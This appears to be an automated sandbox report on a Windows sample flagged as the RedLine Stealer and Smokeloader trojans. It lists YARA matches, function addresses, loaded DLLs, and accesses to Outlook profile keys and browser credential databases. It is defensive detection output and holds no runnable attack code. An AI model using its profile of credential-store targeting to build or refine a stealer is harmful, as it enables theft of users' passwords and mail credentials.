Source: FBFIDBFHDBGIDHJJEGHIIDAFID.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: q27UFusYdn.exe, 00000000.00000003.1817039320.000000002AA6C000.00000004.00000020.00020000.00000000.sdmp, FBFIDBFHDBGIDHJJEGHIIDAFID.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2177166200.000000000412C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2177312621.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD1ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	0_2_6CD1ED10
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD5B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CD5B700
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD5B8C0 rand_s,NtQueryVirtualMemory,	0_2_6CD5B8C0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD5B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6CD5B910
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CCFF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CCFF280

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CCF35A0	0_2_6CCF35A0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD1D4D0	0_2_6CD1D4D0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD064C0	0_2_6CD064C0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD36CF0	0_2_6CD36CF0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CCFD4E0	0_2_6CCFD4E0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD06C80	0_2_6CD06C80
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD534A0	0_2_6CD534A0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD5C4A0	0_2_6CD5C4A0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD6545C	0_2_6CD6545C
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD05440	0_2_6CD05440
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD35C10	0_2_6CD35C10
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD42C10	0_2_6CD42C10
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD6AC00	0_2_6CD6AC00
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD6542B	0_2_6CD6542B
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD30DD0	0_2_6CD30DD0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD585F0	0_2_6CD585F0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD20512	0_2_6CD20512
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD1ED10	0_2_6CD1ED10
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD0FD00	0_2_6CD0FD00
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD0FEF0	0_2_6CD0FEF0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD676E3	0_2_6CD676E3
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CCFBEF0	0_2_6CCFBEF0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD15E90	0_2_6CD15E90
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD5E680	0_2_6CD5E680
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD54EA0	0_2_6CD54EA0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD19E50	0_2_6CD19E50
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD33E50	0_2_6CD33E50
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD14640	0_2_6CD14640
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD42E4E	0_2_6CD42E4E
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD66E63	0_2_6CD66E63
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CCFC670	0_2_6CCFC670
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD37E10	0_2_6CD37E10
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD45600	0_2_6CD45600
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD59E30	0_2_6CD59E30
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD26FF0	0_2_6CD26FF0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CCFDFE0	0_2_6CCFDFE0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD477A0	0_2_6CD477A0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD37710	0_2_6CD37710
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD09F00	0_2_6CD09F00
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD650C7	0_2_6CD650C7
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD1C0E0	0_2_6CD1C0E0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD358E0	0_2_6CD358E0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD260A0	0_2_6CD260A0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD18850	0_2_6CD18850
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD1D850	0_2_6CD1D850
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD3F070	0_2_6CD3F070
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD07810	0_2_6CD07810
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD3B820	0_2_6CD3B820
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD44820	0_2_6CD44820
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD35190	0_2_6CD35190
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD52990	0_2_6CD52990
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD2D9B0	0_2_6CD2D9B0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CCFC9A0	0_2_6CCFC9A0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD1A940	0_2_6CD1A940
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD4B970	0_2_6CD4B970
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD6B170	0_2_6CD6B170
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD0D960	0_2_6CD0D960
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD38AC0	0_2_6CD38AC0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD11AF0	0_2_6CD11AF0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD3E2F0	0_2_6CD3E2F0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD6BA90	0_2_6CD6BA90
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD0CAB0	0_2_6CD0CAB0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD62AB0	0_2_6CD62AB0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CCF22A0	0_2_6CCF22A0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD24AA0	0_2_6CD24AA0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD39A60	0_2_6CD39A60
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD653C8	0_2_6CD653C8
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CCFF380	0_2_6CCFF380
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CCF5340	0_2_6CCF5340
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD0C370	0_2_6CD0C370
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD3D320	0_2_6CD3D320
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDFECD0	0_2_6CDFECD0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD9ECC0	0_2_6CD9ECC0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDAAC60	0_2_6CDAAC60
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE7AC30	0_2_6CE7AC30
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE66C00	0_2_6CE66C00
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CF2CDC0	0_2_6CF2CDC0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDA4DB0	0_2_6CDA4DB0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE36D90	0_2_6CE36D90
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE6ED70	0_2_6CE6ED70
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CECAD50	0_2_6CECAD50
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CF28D20	0_2_6CF28D20
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDAAEC0	0_2_6CDAAEC0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE40EC0	0_2_6CE40EC0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE26E90	0_2_6CE26E90
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE3EE70	0_2_6CE3EE70
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE80E20	0_2_6CE80E20
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE7EFF0	0_2_6CE7EFF0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDA0FE0	0_2_6CDA0FE0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CEE8FB0	0_2_6CEE8FB0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDAEFB0	0_2_6CDAEFB0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE62F70	0_2_6CE62F70
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE0EF40	0_2_6CE0EF40
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDA6F10	0_2_6CDA6F10
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CEE0F20	0_2_6CEE0F20
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CEA68E0	0_2_6CEA68E0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE74840	0_2_6CE74840
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE2A820	0_2_6CE2A820
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDF0820	0_2_6CDF0820
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CEBC9E0	0_2_6CEBC9E0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDD49F0	0_2_6CDD49F0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE309A0	0_2_6CE309A0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE5A9A0	0_2_6CE5A9A0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE609B0	0_2_6CE609B0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDD8960	0_2_6CDD8960
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDF6900	0_2_6CDF6900
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE1EA80	0_2_6CE1EA80
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE1CA70	0_2_6CE1CA70
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE58A30	0_2_6CE58A30
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE4EA00	0_2_6CE4EA00
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CEA6BE0	0_2_6CEA6BE0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE40BA0	0_2_6CE40BA0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDE64D0	0_2_6CDE64D0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE3A4D0	0_2_6CE3A4D0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CECA480	0_2_6CECA480
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CDB8460	0_2_6CDB8460
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE04420	0_2_6CE04420

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: String function: 6CD2CBE8 appears 134 times
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: String function: 6CD394D0 appears 90 times
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: String function: 004043B0 appears 316 times

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 2160

Source: q27UFusYdn.exe, 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs q27UFusYdn.exe
Source: q27UFusYdn.exe, 00000000.00000002.2176993388.0000000004023000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs q27UFusYdn.exe
Source: q27UFusYdn.exe, 00000000.00000002.2196218365.000000006CD82000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs q27UFusYdn.exe
Source: q27UFusYdn.exe	Binary or memory string: OriginalFilenameFires( vs q27UFusYdn.exe

Source: q27UFusYdn.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2177166200.000000000412C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2177312621.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/38@0/1

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: 0_2_6CD57030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6CD57030

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00415D00

Source: C:\Users\user\Desktop\q27UFusYdn.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6672

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\a0e0d7d0-12eb-4cab-a18c-fc3881aadb3f

Jump to behavior

Source: q27UFusYdn.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\q27UFusYdn.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: q27UFusYdn.exe, 00000000.00000002.2187081048.000000001E64A000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmp, q27UFusYdn.exe, 00000000.00000002.2195950119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: q27UFusYdn.exe, 00000000.00000002.2187081048.000000001E64A000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmp, q27UFusYdn.exe, 00000000.00000002.2195950119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: q27UFusYdn.exe, 00000000.00000002.2187081048.000000001E64A000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmp, q27UFusYdn.exe, 00000000.00000002.2195950119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: q27UFusYdn.exe, 00000000.00000002.2187081048.000000001E64A000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmp, q27UFusYdn.exe, 00000000.00000002.2195950119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: q27UFusYdn.exe, q27UFusYdn.exe, 00000000.00000002.2187081048.000000001E64A000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmp, q27UFusYdn.exe, 00000000.00000002.2195950119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: q27UFusYdn.exe, 00000000.00000002.2187081048.000000001E64A000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2195950119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: q27UFusYdn.exe, 00000000.00000002.2187081048.000000001E64A000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmp, q27UFusYdn.exe, 00000000.00000002.2195950119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: q27UFusYdn.exe, 00000000.00000003.1701560156.00000000245C4000.00000004.00000020.00020000.00000000.sdmp, CBAKJEHDBGHIEBGCGDGH.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: q27UFusYdn.exe, 00000000.00000002.2187081048.000000001E64A000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2195950119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: q27UFusYdn.exe, 00000000.00000002.2187081048.000000001E64A000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2195950119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: q27UFusYdn.exe

Virustotal: Detection: 40%

Source: unknown	Process created: C:\Users\user\Desktop\q27UFusYdn.exe "C:\Users\user\Desktop\q27UFusYdn.exe"
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 2160

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\q27UFusYdn.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: q27UFusYdn.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

